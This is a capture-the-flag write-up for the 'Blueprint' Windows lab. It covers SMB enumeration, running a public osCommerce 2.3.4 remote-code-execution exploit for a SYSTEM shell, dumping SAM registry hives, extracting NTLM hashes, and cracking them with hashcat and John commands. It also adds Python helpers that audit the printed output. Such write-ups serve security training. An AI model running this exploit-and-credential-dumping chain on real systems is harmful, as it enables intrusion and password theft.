Blueprint
The Blueprint machine presented several vulnerabilities:
- Open Network Ports and Services: Numerous open ports were identified, including common services like SMB, HTTP, HTTPS, and MySQL. The presence of these services, particularly SMB, indicated potential attack vectors.
- SMB Enumeration: Successful SMB enumeration revealed user accounts, suggesting weak access controls or default configurations.
- Vulnerable Web Application (osCommerce 2.3.4): A publicly disclosed Remote Code Execution (RCE) vulnerability in the osCommerce 2.3.4 application allowed for arbitrary code execution as the nt authority\system user.
- Weak NTLM Hash: The NTLM hash for the "Lab" user was obtained and successfully cracked, revealing a weak password.
These vulnerabilities, when chained together, allowed for a complete system compromise.
Reconnaissance and Scanning
export TARGET_IP=10.10.151.2
nmap -p- --min-rate 5000 $TARGET_IP
Output:
Not shown: 61044 closed tcp ports (reset), 4478 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
3306/tcp open mysql
8080/tcp open http-proxy
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49158/tcp open unknown
49159/tcp open unknown
49160/tcp open unknown
Analysis:
- 139/tcp (NetBIOS) and 445/tcp (SMB): Windows file sharing services, often vulnerable to misconfigurations and exploits.
SMB Enumeration
Given the presence of SMB, further enumeration was performed using nbtscan and nmap's SMB scripts.
NetBIOS Name Resolution (nbtscan)
nbtscan was used to resolve NetBIOS names and identify the target's hostname and workgroup.
nbtscan -v -r $TARGET_IP
Output:
NetBIOS Name Table for Host 10.10.151.2:
Incomplete packet, 209 bytes long.
Name Service Type
----------------------------------------
BLUEPRINT <00> UNIQUE
WORKGROUP <00> GROUP
BLUEPRINT <20> UNIQUE
WORKGROUP <1e> GROUP
WORKGROUP <1d> UNIQUE
__MSBROWSE__ <01> GROUP
Adapter address: 02:09:5a:5c:5a:45
----------------------------------------
Analysis:
This confirmed the hostname as "BLUEPRINT" and the workgroup as "WORKGROUP".
SMB User Enumeration (nmap)
The smb-enum-users script in nmap was used to attempt to list user accounts on the target system.
nmap -p445 --script smb-enum-users $TARGET_IP
Output:
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-enum-users:
| BLUEPRINT\Administrator (RID: 500)
| Description: Built-in account for administering the computer/domain
| Flags: Password does not expire, Normal user account
| BLUEPRINT\Guest (RID: 501)
| Description: Built-in account for guest access to the computer/domain
| Flags: Password not required, Password does not expire, Normal user account
| BLUEPRINT\Lab (RID: 1000)
| Full name: Steve
|_ Flags: Normal user account
Analysis:
This revealed three user accounts: Administrator, Guest, and Lab. The presence of these accounts, especially the Administrator account, indicated a potential target for privilege escalation. The "Password not required" flag on the Guest account indicates a significant misconfiguration.
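Turning the smb-enum-users block above into audit findings is a small parsing job. The following is an added example (not part of the original writeup) that parses the nmap output exactly as printed and flags the account flags a defender would want to act on; the sample text is the block from this page, embedded as a constructed string.

```python
"""Audit helper for nmap smb-enum-users output (added example, not from the writeup)."""
import re

# Constructed sample: the smb-enum-users block from this page, as nmap prints it.
SAMPLE_OUTPUT = """\
Host script results:
| smb-enum-users:
|   BLUEPRINT\\Administrator (RID: 500)
|     Description: Built-in account for administering the computer/domain
|     Flags:       Password does not expire, Normal user account
|   BLUEPRINT\\Guest (RID: 501)
|     Description: Built-in account for guest access to the computer/domain
|     Flags:       Password not required, Password does not expire, Normal user account
|   BLUEPRINT\\Lab (RID: 1000)
|     Full name:   Steve
|_    Flags:       Normal user account
"""

# "|   DOMAIN\user (RID: n)" opens a new account record; "|   Key: value" fills it in.
ACCOUNT_RE = re.compile(r"^\|_?\s*(?P<domain>[^\\\s]+)\\(?P<user>\S+) \(RID: (?P<rid>\d+)\)$")
FIELD_RE = re.compile(r"^\|_?\s*(?P<key>[A-Za-z ]+):\s*(?P<value>.*)$")

# Flags that are findings on their own, with the reason a report should give.
RISKY_FLAGS = {
    "Password not required": "account can authenticate with an empty password",
    "Password does not expire": "password never rotates",
}


def parse_smb_enum_users(text):
    """Return a list of dicts (domain, user, rid, flags, plus any other printed fields)."""
    accounts = []
    for line in text.splitlines():
        m = ACCOUNT_RE.match(line)
        if m:
            accounts.append({"domain": m["domain"], "user": m["user"],
                             "rid": int(m["rid"]), "flags": set()})
            continue
        m = FIELD_RE.match(line)
        if m and accounts:
            key, value = m["key"].strip(), m["value"].strip()
            if key == "Flags":
                accounts[-1]["flags"] = {f.strip() for f in value.split(",")}
            else:
                accounts[-1][key.lower()] = value
    return accounts


def audit_accounts(accounts):
    """Return (user, reason) tuples for every risky flag found on every account."""
    return [(a["user"], reason) for a in accounts
            for flag, reason in RISKY_FLAGS.items() if flag in a["flags"]]
```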
Web Application Exploitation (osCommerce)
Browsing to http://$TARGET_IP:8080 revealed a directory named oscommerce-2.3.4. This suggested the presence of the osCommerce e-commerce platform.
Vulnerability Identification (searchsploit)
searchsploit was used to search for known vulnerabilities in osCommerce version 2.3.4.
searchsploit oscommerce-2.3.4
Output:
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
osCommerce 2.3.4 - Multiple Vulnerabilities | php/webapps/34582.txt
osCommerce 2.3.4.1 - 'currency' SQL Injection | php/webapps/46328.txt
osCommerce 2.3.4.1 - 'products_id' SQL Injection | php/webapps/46329.txt
osCommerce 2.3.4.1 - 'reviews_id' SQL Injection | php/webapps/46330.txt
osCommerce 2.3.4.1 - 'title' Persistent Cross-Site Scripting | php/webapps/49103.txt
osCommerce 2.3.4.1 - Arbitrary File Upload | php/webapps/43191.py
osCommerce 2.3.4.1 - Remote Code Execution | php/webapps/44374.py
osCommerce 2.3.4.1 - Remote Code Execution (2) | php/webapps/50128.py
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Analysis:
Multiple vulnerabilities were identified, including several Remote Code Execution (RCE) exploits. The exploit at php/webapps/50128.py was chosen.
Exploitation (RCE)
The chosen RCE exploit was executed using Python. This exploit leverages a vulnerability in the osCommerce application to upload and execute a malicious PHP file.
python3 /usr/share/exploitdb/exploits/php/webapps/50128.py http://10.10.151.2:8080/oscommerce-2.3.4/catalog/
Analysis:
The exploit successfully established a reverse shell, granting nt authority\system privileges. This is the highest level of privilege on a Windows system.
Root Flag Retrieval:
RCE_SHELL$ whoami # nt authority\system
RCE_SHELL$ dir C:\Users
RCE_SHELL$ type C:\Users\Administrator\Desktop\root.txt.txt
Post-Exploitation and NTLM Hash Extraction
After gaining system-level access, the next step was to retrieve the NTLM hash of the Lab user. This involved dumping the Security Account Manager (SAM) database, which stores user password hashes.
Registry Dumping
The reg.exe utility was used to save the relevant registry hives (SAM, SECURITY, and SYSTEM) to files. These hives contain the necessary information to extract the NTLM hashes.
reg.exe save hklm\sam SAM
reg.exe save hklm\security Security
reg.exe save hklm\system SYSTEM
File Transfer
The saved hive files were reachable from the web server at:
http://10.10.151.2:8080/oscommerce-2.3.4/catalog/install/includes/SAM
http://10.10.151.2:8080/oscommerce-2.3.4/catalog/install/includes/Security
http://10.10.151.2:8080/oscommerce-2.3.4/catalog/install/includes/SYSTEM
These files can be downloaded via a web browser or a tool like wget.
Hash Extraction (samdump2)
samdump2 was used to extract the NTLM hashes from the downloaded registry hives.
samdump2 SYSTEM SAM
Output:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:549a1bcb88e35dc18c7a0b0168631411:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Lab:1000:aad3b435b51404eeaad3b435b51404ee:30e87bf999828446a1c1209ddde4c450:::
Explanation:
- The output is in the pwdump format username:RID:LMhash:NTLMhash:::.
- The NTLM hash is the second hash after the RID (the fourth colon-separated field).
- The LM field aad3b435b51404eeaad3b435b51404ee is the constant value for an empty or absent LM hash, so only the NTLM hash is usable here; the Guest NTLM hash 31d6cfe0d16ae931b73c59d7e0c089c0 is the hash of an empty password, matching the "Password not required" flag seen during enumeration.
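A SAM dump in this format is also what a defender would check during an account audit. The following added example (not from the original writeup) parses pwdump-style lines, validates them, and flags accounts with an empty password, a stored LM hash, or a password shared with another account; the sample lines are the three from this page, embedded as a constructed string.

```python
"""Audit helper for pwdump-style samdump2 output (added example, not from the writeup)."""

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM field when no LM hash is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password

# Constructed sample: the three lines samdump2 printed in the writeup.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:549a1bcb88e35dc18c7a0b0168631411:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Lab:1000:aad3b435b51404eeaad3b435b51404ee:30e87bf999828446a1c1209ddde4c450:::
"""


def parse_pwdump_line(line):
    """Split username:RID:LMhash:NThash::: into a dict, rejecting malformed input."""
    fields = line.rstrip("\n").split(":")
    if len(fields) != 7 or not fields[1].isdigit():
        raise ValueError(f"not a pwdump line: {line!r}")
    user, rid, lm, nt = fields[0], int(fields[1]), fields[2].lower(), fields[3].lower()
    for h in (lm, nt):  # both hashes are 16 bytes, printed as 32 hex characters
        if len(h) != 32 or any(c not in "0123456789abcdef" for c in h):
            raise ValueError(f"bad hash in line: {line!r}")
    return {"user": user, "rid": rid, "lm": lm, "nt": nt}


def audit_pwdump(text):
    """Return (account, reason) findings for empty, LM-stored, or reused passwords."""
    findings, by_nt = [], {}
    for line in text.splitlines():
        if not line.strip():
            continue
        rec = parse_pwdump_line(line)
        if rec["nt"] == EMPTY_NT:
            findings.append((rec["user"], "empty password"))
        if rec["lm"] != EMPTY_LM:
            findings.append((rec["user"], "LM hash stored (weak legacy hashing)"))
        by_nt.setdefault(rec["nt"], []).append(rec["user"])
    # Identical NT hashes mean identical passwords (NT hashing is unsalted).
    for nt, users in by_nt.items():
        if len(users) > 1 and nt != EMPTY_NT:
            findings.append((", ".join(users), "same password reused"))
    return findings
```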
NTLM Hash Cracking
The NTLM hash for the Lab user (30e87bf999828446a1c1209ddde4c450) was then cracked. While I used ntlm.pw, a more robust and professional approach would involve using a dedicated password cracking tool like hashcat or John the Ripper.
Example using hashcat:
hashcat -m 1000 30e87bf999828446a1c1209ddde4c450 /usr/share/wordlists/seclists/Passwords/xato-net-10-million-passwords-1000000.txt
Or, using John the Ripper:
echo "Lab:1000:aad3b435b51404eeaad3b435b51404ee:30e87bf999828446a1c1209ddde4c450:::" > hash.txt
john --wordlist=/usr/share/wordlists/seclists/Passwords/xato-net-10-million-passwords-1000000.txt --format=NT hash.txt